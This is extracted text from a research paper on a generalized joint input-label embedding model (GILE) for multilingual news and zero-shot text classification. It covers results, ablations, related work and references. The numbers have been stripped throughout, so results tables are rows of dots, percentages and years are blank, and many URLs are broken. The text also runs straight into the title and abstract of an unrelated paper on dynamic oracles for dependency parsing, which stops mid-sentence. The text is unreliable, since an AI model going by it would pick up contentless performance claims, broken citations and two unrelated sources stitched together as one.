input-label model, in our preliminary experiments, we also trained the neu- ral model with a hinge loss as wsabie+ and aitextml, but it performed similarly to them and much worse than wan, so we did not further experiment with it. gile-wan, outperforms wan even on seen la- bels, where our model has higher average preci- sion by + . points, better ranking loss by + % and comparable oneerr (− %). and this gain is not at the expense of performance on unseen la- bels. gile-wan, outperforms wsabie+, ai- textml variants by a large margin in both cases, e.g. by + . , + . points on seen labels and by + . , + . points in terms of average preci- sion on unseen labels, respectively. interestingly, our gile-wan model also outperforms the two previous bilinear input-label embedding formula- tions of yazdani and henderson ( ) and nam et al. ( ), namely bil-wan [yh ] and bil- wan [n ] by + . , + . points on seen la- bels and + . and + . points on unseen la- bels, respectively, even when they are trained with the same encoders and loss as ours. these mod- els are not able to outperform the wan baseline when evaluated on the seen labels, namely they have − . and − . points lower average preci- sion than wan, but they outperform wsabie+ and aitextml on both seen and unseen labels. overall, the results show a clear advantage of our generalized input-label embedding model against previous models on both seen and unseen labels. . . ablation analysis to evaluate the effectiveness of individual com- ponents of our model, we performed an ablation study (last three rows in table ). note that when we use only the label or only the input embedding namely, avg when using the average of word vectors and inf when using inferred label vectors to make predictions. in our generalized input-label formulation, the di- mensionality of the joint space is constrained to be the dimensionality of the encoded labels and inputs respectively, that is dj= in our experi- ments. all three variants of our model outperform previous embedding formulations of nam et al. ( ) and yazdani and henderson ( ) in all metrics except from avgpr on seen labels where they score slightly lower. the decrease in avgprec for our model variants with dj= compared to the neural baselines could be attributed to the dif- ficulty in learning the parameters of a highly non- linear space with only a few hidden dimensions. indeed, when we increase the number of dimen- sions (dj= ), our full model outperforms them by a large margin. recall that this increase in ca- pacity is only possible with our full model defini- tion in eq. and none of the other variants allow us to do this without interfering with the original dimensionality of the encoded labels (e) and input (ht). in addition, our model variants with dj= exhibit consistently higher scores than baselines in terms of most metrics on both seen and unseen la- bels, which suggests that they are able to capture more complex relationships across labels and be- tween encoded inputs and labels. overall, the best performance among our model variants is achieved when using only the label em- bedding and, hence, it is the most significant com- ponent of our model. surprisingly, our model with only the label embedding achieves higher perfor- mance than our full model on unseen labels but it is far behind our full model when we consider per- formance on both seen and unseen labels. when we constrain our full model to have the same di- mensionality with the other variants, i.e. dj= , it outperforms the one that uses only the input em- bedding in most metrics and it is outperformed by the one that uses only the label embedding. . multilingual news text classification we evaluate on multilingual news text classifica- tion to demonstrate that our output layer based on the generalized input-label embedding outper- forms previous models with a typical output layer in a wide variety of settings, even for labels which have been seen during training. . . settings we follow the exact evaluation protocol, data and settings of pappas and popescu-belis ( ), as described below. the dataset is split per language into % for training, % for validation and % for testing. we evaluate on both types of labels (general yg, and specific ys) in a full-resource scenario, and we evaluate only on the general la- bels (yg) in a low-resource scenario. accuracy is measured with the micro-averaged f percentage scores. the word embeddings for this task are the aligned pre-trained -dimensional multi-cca multilingual word embeddings by ammar et al. ( ) and are kept fixed during training. the sentences are already truncated at a length of words and the documents at a length of sen- tences. the hyper-parameters were selected on validation data as follows: -dimensional en- coder and attention, relu activation, batch size of , epoch size of k, no negative sampling (all labels are used) and optimization with adam until convergence. to ensure equal capacity to baselines, we use approximately the same number of parameters ntot with the baseline classification layers, by setting: dj ' dh ∗ |k(i)| dh + d , i = , . . . ,m, ( ) in the monolingual case, and similarly, dj ' (dh ∗ ∑m i= |k (i)|)/(dh + d) in the multilingual case, where k(i) is the number of labels in lan- guage i. the hierarchical models have dense encoders in all scenarios (tables , , and ), except from the varying encoder experiment (table ). for the low-resource scenario, the levels of data avail- ability are: tiny from . % to . %, small from % to % and medium from % to % of the original training set. for each level, the aver- age f across discrete increments of . , and are reported respectively. the decision thresh- olds, which were tuned on validation data by pap- pas and popescu-belis ( ), are set as follows: for the full-resource scenario it is set to . for |ys| < and . for |ys| ≥ , and for the low-resource scenario it is set to . for all sets. the baselines are all the monolingual and multi- lingual neural networks from pappas and popescu- belis ( ) , noted as [pb ], namely: the word embeddings are not included in the parameters statistics because they are not variables of the network. for reference, in table we also compare to a logistic regression trained with unigrams over the full vocabulary and models languages (en + aux → en) languages (en + aux → aux) stat. yg abbrev. de es pt uk ru ar fa de es pt uk ru ar fa avg [p b ] m on o nn (avg) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . hnn (avg) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . han (att) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . m ul ti mhan-enc . . . . . . . . . . . . . . . mhan-att . . . . . . . . . . . . . . . mhan-both . . . . . . . . . . . . . . . o ur s m on o gile-nn (avg) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . gile-hnn (avg) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . gile-han (att) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . m ul ti gile-mhan-enc . . . . . . . . . . . . . . . gile-mhan-att . . . . . . . . . . . . . . . gile-mhan-both . . . . . . . . . . . . . . . ys models de es pt uk ru ar fa de es pt uk ru ar fa avg [p b ] m on o nn (avg) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . hnn (avg) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . han (att) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . m ul ti mhan-enc . . . . . . . . . . . . . . . mhan-att . . . . . . . . . . . . . . . mhan-both . . . . . . . . . . . . . . . o ur s m on o gile-nn (avg) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . gile-hnn (avg) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . gile-han (att) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . m ul ti gile-mhan-enc . . . . . . . . . . . . . . . gile-mhan-att . . . . . . . . . . . . . . . gile-mhan-both . . . . . . . . . . . . . . . table : full-resource classification results on general (upper half) and specific (lower half) labels using mono- lingual and bilingual models with dense encoders on english as target (left) and the auxiliary language as target (right). the average bilingual f -score (%) is noted avg and the top ones per block are underlined. the monolin- gual scores on the left come from a single model, hence a single score is repeated multiple times; the repetition is marked with consecutive dots. • nn: a neural network which feeds the av- erage vector of the input words directly to a classification layer, as the one used by kle- mentiev et al. ( ). • hnn: a hierarchical network with encoders and average pooling at every level, followed by a classification layer, as the one used by tang et al. ( ). • han: a hierarchical network with encoders and attention, followed by a classification layer, as the one used by yang et al. ( ). • mhan: three multilingual hierarchical net- works with shared encoders, noted mhan- enc, shared attention, noted mhan-att, and shared attention and encoders, noted mhan-both, as the ones used by pappas and popescu-belis ( ). to ensure a controlled comparison to the above baselines, for each model we evaluate a ver- sion where their output layer is replaced by our generalized input-label embedding output layer over the top- % most frequent words by mrini et al. ( ), noted as [m ], which use the same settings and data. using the same number of parameters; these have the abbreviation “gile” prepended in their name (e.g. gile-han). the scores of han and mhan models in tables , and are the ones re- ported by pappas and popescu-belis ( ), while for table we train them ourselves using their code. lastly, the best score for each pairwise com- parison between a joint input-label model and its counterpart is marked in bold. . . results table displays the results of full-resource docu- ment classification using dense encoders for both general and specific labels. on the left, we display the performance of models on the english sub- corpus when english and an auxiliary language are used for training, and on the right, the perfor- mance on the auxiliary language sub-corpus when that language and english are used for training. the results show that in % of comparisons on general labels (top half of table ) the joint input- label models improve consistently over the cor- responding models using a typical sigmoid clas- sification layer. this finding validates our main hypothesis that the joint input-label models suc- models languages statistics abbrev. en de es pt uk ru ar fa nl fl [m ] logreg-bow . . . . . . . . m . logreg-bow- % . . . . . . . . m . [p b ] han-bigru . . . . . . . . k . han-gru . . . . . . . . k . han-dense . . . . . . . . k . o ur s gile-han-bigru . . . . . . . . k . gile-han-gru . . . . . . . . k . gile-han-dense . . . . . . . . k . table : full-resource classification results on general (yg) topic labels with dense and gru encoders. reported are also the average number of parameters per language (nl), and the average f per language (fl). cessfully exploit the semantics of the labels, which provide useful cues for classification, as opposed to models which are agnostic to label semantics. the results for specific labels (bottom half of ta- ble ) demonstrate the same trend, with the joint input-label models performing better in % of comparisons. in table , we also directly compare our em- bedding to previous bilinear input-label embed- ding formulations when using the best monolin- gual configuration (han) from table , exactly as done in section . . the results on the general labels show that gile outperforms the previous bilinear input-label models, bil [yh ] and bil [n ], by + . and + . percentage points on av- erage respectively. this difference is much more pronounced on the specific labels, where the label set is much larger, namely + . and + . percent- age points respectively. similarly, our model with constrained dimensionality is also as good or bet- ter on average than the bilinear input-label models, by + . and + . on general labels and by - . and + . on specific labels respectively, which high- lights the importance of learning non-linear rela- tionships across encoded labels and documents. among our ablated model variants, as in previous section, the best is the one with only the label pro- jection but it still worse than our full model by - . percentage points. the improvements of gile against each baseline is significant and consistent on both datasets. hence, in the following experi- ments we will only consider the best of these al- ternatives. the best bilingual performance on average is that of the gile-mhan-att model, for both gen- eral and specific labels. this improvement can be attributed to the effective sharing between la- han languages yg output layer en de es pt uk ru ar fa linear [pb ] . . . . . . . . bil [yh ] . . . . . . . . bil [n ] . . . . . . . . gile (ours) . . . . . . . . - constrained dj . . . . . . . . - only label . . . . . . . . - only input . . . . . . . . ys output layer en de es pt uk ru ar fa linear[pb ] . . . . . . . . bil [yh ] . . . . . . . . bil [n ] . . . . . . . . gile (ours) . . . . . . . . - constrained dj . . . . . . . . - only label . . . . . . . . - only input . . . . . . . . table : direct comparison with previous bilin- ear input-label models, namely bil [yh ] and bil [n ], and with our ablated model variants using the best monolingual configuration (han) from table on both general (upper half) and specific (lower half) labels. best scores among the competing models are marked in bold. bel semantics across languages through the joint multilingual input-label output layer. effectively, this model has the same multilingual sharing scheme with the best model reported by pappas and popescu-belis ( ), mhan-att, namely sharing attention at each level of the hierarchy, which agrees well with their main finding. in- terestingly, the improvement holds when using different types of hierarchical encoders, namely models general labels specific labels abbrev. # lang. nl fl nl fl [p b ] han k . k . mhan k . k . mhan k . k . o ur s gile-han k . k . gile-mhan k . k . gile-mhan k . k . table : multilingual learning results. the columns are the average number of parameters per language (nl), average f per language (fl). dense gru, and bigru, as shown in table , which demonstrate the generality of the approach. in addition, our best models outperform logis- tic regression trained either on top- % most fre- quent words or on the full vocabulary, even though our models utilize many fewer parameters, namely k/ k vs. m/ m. increasing the capacity of our models should lead to even further improve- ments. multilingual learning. so far, we have shown that the proposed joint input-label models outper- form typical neural models when training with one and two languages. does the improvement remain when increasing the number of languages even more? to answer the question we report in table the average f -score per language for the best baselines from the previous experiment (han and mhan-att) with the proposed joint input-label versions of them (gile-han and gile-mhan- att) when increasing the number of languages ( , and ) that are used for training. overall, we ob- serve that the joint input-label models outperform all the baselines independently of the number of languages involved in the training, while having the same number of parameters. we also replicate the previous result that a second language helps but beyond that there is no improvement. low-resource transfer. we investigate here whether joint input-label models are useful for low-resource languages. table shows the low- resource classification results from english to seven other languages when varying the amount of their training data. our model with both shared en- coders and attention, gile-mhan, outperforms previous models in average, namely han (yang et al., ) and mhan (pappas and popescu- belis, ), for low-resource classification in the majority of the cases. levels [pb ] ours range han mhan gile-mhan en → de . - . % . . . - % . . . - % . . . en → es . - . % . . . - % . . . - % . . . en → pt . - . % . . . - % . . . - % . . . en → uk . - . % . . . - % . . . - % . . . en → ru . - . % . . . - % . . . - % . . . en → ar . - . % . . . - % . . . - % . . . en → fa . - . % . . . - % . . . - % . . . table : low-resource classification results with vari- ous sizes of training data using the general labels. the shared input-label space appears to be help- ful especially when transferring from english to german, portuguese and arabic languages. gile- mhan is significantly behind mhan on trans- ferring knowledge from english to spanish and to russian in the . - . % resource setting, but in the rest of the cases they have very similar scores. label sampling. to speedup computation it is possible to train our model by sampling labels, in- stead of training over the whole label set. how much speed-up can we achieve from this label sampling approach and still retain good levels of performance? in figure , we attempt to answer this question by reporting the performance of our gile-hnn model when varying the amount of labels (%) that it uses for training over english general and specific labels of the dw dataset. in both cases, the performance of gile-hnn tends to increase as the percentage of labels sampled in- creases, but it levels off for the higher percentages. for general labels, top performance is reached with a % to % sampling rate, which translates to a % to % speedup, while for the specific labels, it is reached with a % to % sampling rate, which translates to a % to % speedup. figure : varying sampling percentage for general and specific english labels. (top) gile-hnn is compared against hnn in terms of f (%). (bottom) the runtime speedup over gile-hnn trained on the full label set. the speedup is correlated to the size of the label set, since there are many fewer general labels than specific labels, namely vs , here. hence, we expect even higher speedups for bigger label sets. interestingly, gile-hnn with label sam- pling reaches the performance of the baseline with a % and % sample for general and specific labels respectively. this translates to a speedup of % and % respectively compared to a gile- hnn trained over all labels. overall, these results show that our model is effective and that it can also scale to large label sets. the label sampling should also be useful in tasks where the computation re- sources may be limited or budgeted. related work . neural text classification research in neural text classification was initially based on feed-forward networks, which required unsupervised pre-training (collobert et al., ; mikolov et al., ; le and mikolov, ) and later on they focused on networks with hierarchi- cal structure. kim ( ) proposed a convolu- tional neural network (cnn) for sentence clas- sification. johnson and zhang ( ) proposed a cnn for high-dimensional data classification, while zhang et al. ( ) adopted a character-level cnn for text classification. lai et al. ( ) pro- posed a recurrent cnn to capture sequential infor- mation, which outperformed simpler cnns. lin et al. ( ) and tang et al. ( ) proposed hi- erarchical recurrent neural networks and showed that they were superior to cnn-based models. yang et al. ( ) demonstrated that a hierarchi- cal attention network with bi-directional gated en- coders outperforms previous alternatives. pappas and popescu-belis ( ) adapted such networks to learn hierarchical document structures with shared components across different languages. the issue of scaling to large label sets has been addressed previously by output layer approx- imations (morin and bengio, ) and with the use of sub-word units or character-level modeling (sennrich et al., ; lee et al., ) which is mainly applicable to structured prediction prob- lems. despite the numerous studies, most of the existing neural text classification models ignore label descriptions and semantics. moreover, they are based on typical output layer parametrizations which are dependent on the label set size, and thus are not able to scale well to large label sets nor to generalize to unseen labels. our output layer parametrization addresses these limitations and could potentially improve such models. . output representation learning there exist studies which aim to learn output rep- resentations directly from data without any se- mantic grounding to word embeddings (srikumar and manning, ; yeh et al., ; augen- stein et al., ). such methods have a label- set-size dependent parametrization, which makes them data hungry, less scalable on large label sets and incapable of generalizing to unseen classes. wang et al. ( ) addressed the lack of seman- tic grounding to word embeddings by proposing an efficient method based on label-attentive text representations which are helpful for text classi- fication. however, in contrast to our study, their parametrization is still label-set-size dependent and thus their model is not able to scale well to large label sets nor to generalize to unseen labels. . zero-shot text classification several studies have focused on learning joint input-label representations grounded to word se- mantics for unseen label prediction for images (weston et al., ; socher et al., ; norouzi et al., ; zhang et al., ; fu et al., ), called zero-shot classification. however, there are fewer such studies for text classification. dauphin et al. ( ) predicted semantic utterances of text by mapping them in the same semantic space with the class labels using an unsupervised learning ob- jective. yazdani and henderson ( ) proposed a zero-shot spoken language understanding model based on a bilinear input-label model able to gen- eralize to previously unseen labels. nam et al. ( ), proposed a bilinear joint document-label embedding which learns shared word representa- tions between documents and labels. more re- cently, shu et al. ( ) proposed an approach for open-world classification which aims to identify novel documents during testing but it is not able to generalize to unseen classes. perhaps, the most similar model to ours is from the recent study by pappas et al. ( ) on neural machine translation, with the difference that they have single-word la- bel descriptions and they use a label-set-dependent bias in a softmax linear prediction unit, which is designed for structured prediction. hence, their model can neither handle unseen labels nor multi- label classification, as we do here. compared to previous joint input-label models, the proposed model has a more general and flexi- ble parametrization which allows the output layer capacity to be controlled. moreover, it is not re- stricted to linear mappings, which have limited expressivity, but uses nonlinear mappings, similar to energy-based learning networks (lecun et al., ; belanger and mccallum, ). the link to the latter can be made if we regard p(ij)val in eq. as an energy function for the i-th document and the j-th label, the calculation of which uses a simple multiplicative transformation (eq. ). lastly, the proposed model performs well on both seen and unseen label sets by leveraging the binary cross- entropy loss, which is the standard loss for classi- fication problems, instead of a ranking loss. conclusion we proposed a novel joint input-label embedding model for neural text classification which gener- alizes over existing input-label models and ad- dresses their limitations while preserving high per- formance on both seen and unseen labels. com- pared to baseline neural models with a typical out- put layer, our model is more scalable and has bet- ter performance on the seen labels. compared to previous joint input-label models, it performs sig- nificantly better on unseen labels without compro- mising performance on the seen labels. these im- provements can be attributed to the the ability of our model to capture complex input-label relation- ships, to its controllable capacity and to its training objective which is based on cross-entropy loss. as future work, the label representation could be learned by a more sophisticated encoder, and the label sampling could benefit from importance sampling to avoid revisiting uninformative labels. another interesting direction would be to find a more scalable way of increasing the output layer capacity, for instance using a deep rather than wide classification network. moreover, adapting the proposed model to structured prediction, for instance by using a softmax classification unit in- stead of a sigmoid one, would benefit tasks such as neural machine translation, language model- ing and summarization, in isolation but also when trained jointly with multi-task learning. acknowledgments we are grateful for the support from the euro- pean union through its horizon program in the summa project n. , see http: //www.summa-project.eu. we would also like to thank our action editor, eneko agirre, and the anonymous reviewers for their invaluable sug- gestions and feedback. references waleed ammar, george mulcaire, yulia tsvetkov, guillaume lample, chris dyer, and noah a. smith. . massively multilingual word em- beddings. corr, abs/ . .v . isabelle augenstein, sebastian ruder, and an- ders søgaard. . multi-task learning of pairwise sequence classification tasks over dis- parate label spaces. in proceedings of the conference of the north american chap- ter of the association for computational lin- guistics: human language technologies, vol- ume (long papers), pages – , new orleans, louisiana. david belanger and andrew mccallum. . structured prediction energy networks. in pro- ceedings of the rd international conference on machine learning, volume of proceed- ings of machine learning research, pages – , new york, new york, usa. pmlr. jianshu chen, ji he, yelong shen, lin xiao, xi- aodong he, jianfeng gao, xinying song, and li deng. . end-to-end learning of lda by mirror-descent back propagation over a deep architecture. in advances in neural informa- tion processing systems , pages – , montreal, canada. http://www.summa-project.eu http://www.summa-project.eu https://arxiv.org/abs/ . .v https://arxiv.org/abs/ . .v http://www.aclweb.org/anthology/n - http://www.aclweb.org/anthology/n - http://www.aclweb.org/anthology/n - http://proceedings.mlr.press/v /belanger .html https://papers.nips.cc/paper/ -end-to-end-learning-of-lda-by-mirror-descent-back-propagation-over-a-deep-architecture https://papers.nips.cc/paper/ -end-to-end-learning-of-lda-by-mirror-descent-back-propagation-over-a-deep-architecture https://papers.nips.cc/paper/ -end-to-end-learning-of-lda-by-mirror-descent-back-propagation-over-a-deep-architecture kyunghyun cho, bart van merrienboer, caglar gulcehre, dzmitry bahdanau, fethi bougares, holger schwenk, and yoshua bengio. . learning phrase representations using rnn encoder–decoder for statistical machine transla- tion. in proceedings of the conference on empirical methods in natural language pro- cessing, pages – , doha, qatar. ronan collobert, jason weston, léon bottou, michael karlen, koray kavukcuoglu, and pavel kuksa. . natural language processing (al- most) from scratch. journal of machine learn- ing research, : – . yann n. dauphin, gökhan tür, dilek hakkani- tür, and larry p. heck. . zero-shot learn- ing and clustering for semantic utterance classi- fication. in international conference on learn- ing representations, banff, canada. orhan firat, baskaran sankaran, yaser al- onaizan, fatos t. yarman vural, and kyunghyun cho. . zero-resource translation with multi-lingual neural machine translation. in proceedings of the con- ference on empirical methods in natural language processing, pages – , austin, usa. andrea frome, greg s. corrado, jon shlens, samy bengio, jeff dean, marc aurelio ran- zato, and tomas mikolov. . devise: a deep visual-semantic embedding model. in c. j. c. burges, l. bottou, m. welling, z. ghahramani, and k. q. weinberger, edi- tors, advances in neural information process- ing systems , pages – . curran as- sociates, inc. yanwei fu, tao xiang, yu-gang jiang, xi- angyang xue, leonid sigal, and shaogang gong. . recent advances in zero-shot recognition: toward data-efficient understand- ing of visual content. ieee signal processing magazine, ( ): – . rie johnson and tong zhang. . effective use of word order for text categorization with convolutional neural networks. in proceedings of the conference of the north ameri- can chapter of the association for computa- tional linguistics: human language technolo- gies, pages – , denver, colorado. yoon kim. . convolutional neural networks for sentence classification. in proceedings of the conference on empirical methods in natural language processing, pages – , doha, qatar. alexandre klementiev, ivan titov, and binod bhattarai. . inducing crosslingual dis- tributed representations of words. in pro- ceedings of coling , pages – , mumbai, india. ankit kumar, ozan irsoy, jonathan su, james bradbury, robert english, brian pierce, pe- ter ondruska, ishaan gulrajani, and richard socher. . ask me anything: dynamic memory networks for natural language process- ing. in proceedings of the rd international conference on machine learning, pages – , new york city, usa. siwei lai, liheng xu, kang liu, and jun zhao. . recurrent convolutional neural networks for text classification. in proceedings of the th aaai conference on artificial intelligence, pages – , austin, usa. quoc v. le and tomas mikolov. . distributed representations of sentences and documents. in proceedings of the st international confer- ence on machine learning, pages âăş– , beijing, china. yann lecun, sumit chopra, raia hadsell, fu jie huang, and et al. . a tutorial on energy- based learning. in predicting structured data. mit press. jason lee, kyunghyun cho, and thomas hof- mann. . fully character-level neural ma- chine translation without explicit segmentation. transactions of the association for computa- tional linguistics, : – . rui lin, shujie liu, muyun yang, mu li, ming zhou, and sheng li. . hierarchical recur- rent neural network for document modeling. in proceedings of the conference on empir- ical methods in natural language processing, pages – , lisbon, portugal. thang luong, hieu pham, and christopher d. manning. . effective approaches to attention-based neural machine translation. in https://aclanthology.coli.uni-saarland.de/papers/d - /d - https://aclanthology.coli.uni-saarland.de/papers/d - /d - https://aclanthology.coli.uni-saarland.de/papers/d - /d - http://www.jmlr.org/papers/v /collobert a.html http://www.jmlr.org/papers/v /collobert a.html http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . https://aclweb.org/anthology/d - https://aclweb.org/anthology/d - https://aclweb.org/anthology/d - http://papers.nips.cc/paper/ -devise-a-deep-visual-semantic-embedding-model.pdf http://papers.nips.cc/paper/ -devise-a-deep-visual-semantic-embedding-model.pdf https://doi.org/ . /msp. . https://doi.org/ . /msp. . https://doi.org/ . /msp. . https://aclanthology.coli.uni-saarland.de/papers/n - /n - https://aclanthology.coli.uni-saarland.de/papers/n - /n - https://aclanthology.coli.uni-saarland.de/papers/n - /n - https://aclanthology.info/papers/d - /d - https://aclanthology.info/papers/d - /d - http://www.aclweb.org/anthology/c - http://www.aclweb.org/anthology/c - http://proceedings.mlr.press/v /kumar .html http://proceedings.mlr.press/v /kumar .html http://proceedings.mlr.press/v /kumar .html https://www.aaai.org/ocs/index.php/aaai/aaai /paper/view/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/view/ / http://proceedings.mlr.press/v /le .html http://proceedings.mlr.press/v /le .html http://yann.lecun.com/exdb/publis/pdf/lecun- .pdf http://yann.lecun.com/exdb/publis/pdf/lecun- .pdf https://aclanthology.coli.uni-saarland.de/papers/q - /q - https://aclanthology.coli.uni-saarland.de/papers/q - /q - https://aclanthology.coli.uni-saarland.de/papers/d - /d - https://aclanthology.coli.uni-saarland.de/papers/d - /d - https://aclanthology.info/papers/d - /d - https://aclanthology.info/papers/d - /d - proceedings of the conference on empir- ical methods in natural language processing, pages – , lisbon, portugal. thomas mensink, jakob verbeek, florent per- ronnin, and gabriela csurka. . metric learning for large scale image classification: generalizing to new classes at near-zero cost. in computer vision – eccv , pages – , berlin, heidelberg. springer berlin hei- delberg. tomas mikolov, ilya sutskever, kai chen, greg s corrado, and jeff dean. . distributed representations of words and phrases and their compositionality. in c. j. c. burges, l. bottou, m. welling, z. ghahramani, and k. q. wein- berger, editors, advances in neural information processing systems , pages – . cur- ran associates, inc. frederic morin and yoshua bengio. . hier- archical probabilistic neural network language model. in proceedings of the tenth interna- tional workshop on artificial intelligence and statistics, pages – . khalil mrini, nikolaos pappas, and andrei popescu-belis. . cross-lingual transfer for news article labeling: benchmarking statistical and neural models. in idiap research report, idiap-rr- - . jinseok nam, eneldo loza mencía, and johannes fürnkranz. . all-in text: learning docu- ment, label, and word representations jointly. in proceedings of the th aaai conference on artificial intelligence, aaai’ , pages – , phoenix, arizona. mohammad norouzi, tomas mikolov, samy ben- gio, yoram singer, jonathon shlens, andrea frome, greg corrado, and jeffrey dean. . zero-shot learning by convex combination of semantic embeddings. in international con- ference on learning representations, banff, canada. bo pang and lillian lee. . seeing stars: ex- ploiting class relationships for sentiment cate- gorization with respect to rating scales. in pro- ceedings of the rd annual meeting on as- sociation for computational linguistics, pages – , ann arbor, michigan. nikolaos pappas, lesly miculicich, and james henderson. . beyond weight tying: learn- ing joint input-output embeddings for neural machine translation. in proceedings of the third conference on machine translation: re- search papers, pages – , belgium, brussels. association for computational linguistics. nikolaos pappas and andrei popescu-belis. . multilingual hierarchical attention networks for document classification. in proceedings of the eighth international joint conference on natu- ral language processing (volume : long pa- pers), pages – . alexander m. rush, sumit chopra, and jason weston. . a neural attention model for abstractive sentence summarization. in pro- ceedings of the conference on empiri- cal methods in natural language processing, pages – , lisbon, portugal. rico sennrich, barry haddow, and alexandra birch. . neural machine translation of rare words with subword units. in proceedings of the th annual meeting of the association for computational linguistics (volume : long pa- pers), pages – , berlin, germany. lei shu, hu xu, and bing liu. . doc: deep open classification of text documents. in pro- ceedings of the conference on empiri- cal methods in natural language processing, pages – , copenhagen, denmark. as- sociation for computational linguistics. richard socher, milind ganjoo, christopher d. manning, and andrew y. ng. . zero- shot learning through cross-modal transfer. in proceedings of the th international confer- ence on neural information processing sys- tems, nips’ , pages – , lake tahoe, nevada. vivek srikumar and christopher d. manning. . learning distributed representations for structured output prediction. in proceedings of the th international conference on neu- ral information processing systems - volume , nips’ , pages – , cambridge, ma, usa. mit press. duyu tang, bing qin, and ting liu. . doc- ument modeling with gated recurrent neural https://papers.nips.cc/paper/ -distributed-representations-of-words-and-phrases-and-their-compositionality https://papers.nips.cc/paper/ -distributed-representations-of-words-and-phrases-and-their-compositionality https://papers.nips.cc/paper/ -distributed-representations-of-words-and-phrases-and-their-compositionality https://www.iro.umontreal.ca/~lisa/pointeurs/hierarchical-nnlm-aistats .pdf https://www.iro.umontreal.ca/~lisa/pointeurs/hierarchical-nnlm-aistats .pdf https://www.iro.umontreal.ca/~lisa/pointeurs/hierarchical-nnlm-aistats .pdf https://publidiap.idiap.ch/index.php/publications/show/ https://publidiap.idiap.ch/index.php/publications/show/ https://publidiap.idiap.ch/index.php/publications/show/ https://www.aaai.org/ocs/index.php/aaai/aaai /paper/view/ https://www.aaai.org/ocs/index.php/aaai/aaai /paper/view/ https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://aclanthology.coli.uni-saarland.de/papers/p - /p - https://aclanthology.coli.uni-saarland.de/papers/p - /p - https://aclanthology.coli.uni-saarland.de/papers/p - /p - http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/w - http://aclweb.org/anthology/i - http://aclweb.org/anthology/i - https://aclanthology.coli.uni-saarland.de/papers/d - /d - https://aclanthology.coli.uni-saarland.de/papers/d - /d - https://aclanthology.coli.uni-saarland.de/papers/p - /p - https://aclanthology.coli.uni-saarland.de/papers/p - /p - https://www.aclweb.org/anthology/d - https://www.aclweb.org/anthology/d - https://papers.nips.cc/paper/ -zero-shot-learning-through-cross-modal-transfer https://papers.nips.cc/paper/ -zero-shot-learning-through-cross-modal-transfer http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . https://doi.org/ . /v /d - https://doi.org/ . /v /d - network for sentiment classification. in pro- ceedings of the conference on empiri- cal methods in natural language processing, pages – , lisbon, portugal. associa- tion for computational linguistics. guoyin wang, chunyuan li, wenlin wang, yizhe zhang, dinghan shen, xinyuan zhang, ricardo henao, and lawrence carin. . joint em- bedding of words and labels for text classifica- tion. in proceedings of the th annual meet- ing of the association for computational lin- guistics (volume : long papers), pages – . association for computational linguis- tics. jason weston, samy bengio, and nicolas usunier. . large scale image annotation: learn- ing to rank with joint word-image embeddings. mach. learn., ( ): – . jason weston, samy bengio, and nicolas usunier. . wsabie: scaling up to large vocab- ulary image annotation. in proceedings of the twenty-second international joint confer- ence on artificial intelligence (volume ), pages – , barcelona, spain. zichao yang, diyi yang, chris dyer, xiaodong he, alex smola, and eduard hovy. . hier- archical attention networks for document clas- sification. in proceedings of the confer- ence of the north american chapter of the as- sociation for computational linguistics: hu- man language technologies, pages – , san diego, california. majid yazdani and james henderson. . a model of zero-shot learning of spoken language understanding. in proceedings of the conference on empirical methods in natural language processing, pages – , lisbon, portugal. chih-kuan yeh, wei-chieh wu, wei-jen ko, and yu-chiang frank wang. . learning deep latent spaces for multi-label classification. in in proceedings of the nd aaai conference on artificial intelligence, new orleans, usa. xiang zhang, junbo zhao, and yann lecun. . character-level convolutional networks for text classification. in advances in neural information processing systems , pages – , montreal, canada. yang zhang, boqing gong, and mubarak shah. . fast zero-shot image tagging. in pro- ceedings of the ieee conference on computer vision and pattern recognition, las vegas, usa. https://doi.org/ . /v /d - http://aclweb.org/anthology/p - http://aclweb.org/anthology/p - http://aclweb.org/anthology/p - https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://ai.google/research/pubs/pub https://ai.google/research/pubs/pub https://aclanthology.coli.uni-saarland.de/papers/n - /n - https://aclanthology.coli.uni-saarland.de/papers/n - /n - https://aclanthology.coli.uni-saarland.de/papers/n - /n - https://aclanthology.coli.uni-saarland.de/papers/d - /d - https://aclanthology.coli.uni-saarland.de/papers/d - /d - https://aclanthology.coli.uni-saarland.de/papers/d - /d - https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://papers.nips.cc/paper/ -character-level-convolutional-networks-for-text-classification.html http://papers.nips.cc/paper/ -character-level-convolutional-networks-for-text-classification.html https://arxiv.org/abs/ . training deterministic parsers with non-deterministic oracles training deterministic parsers with non-deterministic oracles yoav goldberg bar-ilan university department of computer science ramat-gan, israel yoav.goldberg@gmail.com joakim nivre uppsala university department of linguistics and philology uppsala, sweden joakim.nivre@lingfil.uu.se abstract greedy transition-based parsers are very fast but tend to suffer from error propagation. this problem is aggravated by the fact that they are normally trained using oracles that are deter- ministic and incomplete in the sense that they assume a unique canonical path through the transition system and are only valid as long as the parser does not stray from this path. in this paper, we give a general characterization of oracles that are nondeterministic and com- plete, present a method for deriving such ora- cles for transition systems that satisfy a prop- erty we call arc decomposition, and instanti- ate this method for three well-known transi- tion systems from the literature. we say that these oracles are dynamic, because they allow us to dynamically explore alternative and non- optimal paths during training – in contrast to oracles that statically assume a unique optimal path. experimental evaluation on a wide range of data sets clearly shows that using dynamic oracles to 